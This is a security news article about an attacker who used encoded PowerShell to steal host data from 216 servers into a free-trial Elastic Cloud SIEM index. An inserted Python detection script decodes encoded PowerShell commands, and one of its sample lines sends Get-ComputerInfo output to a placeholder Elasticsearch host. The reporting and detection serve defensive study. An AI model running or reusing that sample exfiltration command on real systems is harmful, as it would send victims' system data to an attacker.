www.infosecurity-magazine.com 3/9/2026, 3:56:48 PM · via preferred

PowerShell data theft via Elastic Cloud SIEM targets 216 hosts

A campaign exploiting multiple software flaws to steal system data and store it in a cloud-based security platform has been uncovered by cybersecurity researchers, with investigators noting a threat actor used a free-trial Elastic Cloud SIEM instance to collect and analyse data from compromised systems across dozens of organisations.

According to the investigation, the attacker deployed an encoded PowerShell command on compromised systems that gathered detailed host information and transmitted it to an Elasticsearch index named "systeminfo", where the data supported triage and target prioritisation through the SIEM tooling. The Elastic Cloud deployment was created on January 28, 2026, and remained active for several days, with the operator interacting through the Kibana interface and logging hundreds of actions.
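As an added illustration, not taken from the article or from the researchers' tooling, the following Python heuristic decodes a PowerShell `-EncodedCommand` argument from a process-creation log line and flags scripts that both collect host inventory and write to an Elasticsearch document endpoint; the sample command lines, the cmdlets used in them and the placeholder hostname are constructed assumptions, with the index name "systeminfo" the only detail taken from the article.

```python
import base64
import re
from typing import Optional

# PowerShell accepts several abbreviations of -EncodedCommand.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Defender heuristics: host-inventory collection and Elasticsearch document writes.
COLLECT = re.compile(r"Get-ComputerInfo|systeminfo|Win32_(?:OperatingSystem|ComputerSystem)", re.IGNORECASE)
ES_WRITE = re.compile(r"/(?:_doc|_bulk|_create)\b|/systeminfo/", re.IGNORECASE)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden in a -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before base64.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(cmdline: str) -> str:
    """Label a process command line by what its decoded PowerShell payload does."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return "no-encoded-command"
    collects = bool(COLLECT.search(script))
    exfil = bool(ES_WRITE.search(script))
    if collects and exfil:
        return "host-inventory-to-elasticsearch"
    if exfil:
        return "elasticsearch-write"
    if collects:
        return "host-inventory"
    return "encoded-other"

def encode_ps(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines; the hostname is a placeholder, not a real indicator.
SAMPLES = {
    "inventory_exfil": "powershell.exe -NoP -W Hidden -enc " + encode_ps(
        "$d = Get-ComputerInfo | ConvertTo-Json; Invoke-RestMethod -Method Post "
        "-Uri 'https://PLACEHOLDER.elastic-cloud.example:9243/systeminfo/_doc' -Body $d"),
    "benign_encoded": "powershell.exe -enc " + encode_ps("Get-Date | Out-File C:\\temp\\date.txt"),
    "plain": "powershell.exe -File C:\\scripts\\backup.ps1",
}

if __name__ == "__main__":
    for name, line in SAMPLES.items():
        print(f"{name}: {classify(line)}")
```

Run over real 4688 or Sysmon event 1 command lines, the "host-inventory-to-elasticsearch" label is the one worth alerting on; the other labels are context, not verdicts.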

Data recovered shows the campaign affected at least 216 hosts across 34 Active Directory domains, predominantly servers running Windows Server 2019 or 2022. Victims spanned government, universities, financial services, manufacturing, IT service providers and retailers, with some evidence suggesting exploitation of other platforms such as Microsoft SharePoint; the cloud instance has since been taken offline.

Article by CyberSIXT